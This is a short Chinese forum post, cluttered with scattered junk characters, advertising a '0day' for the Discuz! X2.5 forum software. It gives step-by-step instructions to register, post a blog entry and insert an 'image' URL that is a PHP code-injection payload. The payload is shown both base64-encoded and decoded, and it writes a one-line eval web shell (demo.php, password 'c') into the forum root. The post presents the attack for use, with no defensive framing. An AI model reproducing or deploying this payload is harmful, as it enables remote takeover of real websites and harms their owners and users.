DZ X2.5最新0day
& i! [! ?/ c u5 A6 z8 z3 d2 I1.注册任意账户
6 }( {- g9 p- k7 p/ w E2.登陆用户,发表blog日志(注意是日志) //点击一下中间注册的用户名 就看到了
8 L' w8 c! ?; c" x; B9 E; N6 y/ o) [3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}} //所使用代码# t* L3 M# k. y% E% g
<?php @eval($_POST[c]); ?>ok
8 \" z9 k: o$ t# p* Q<?fputs(fopen("dome","w"),"<?eval(\$_POST[c]);?>")?>
) M# c) ^- s8 @2 q( L, p" |4.访问日志,论坛根目录下生成demo.php,一句发密码C |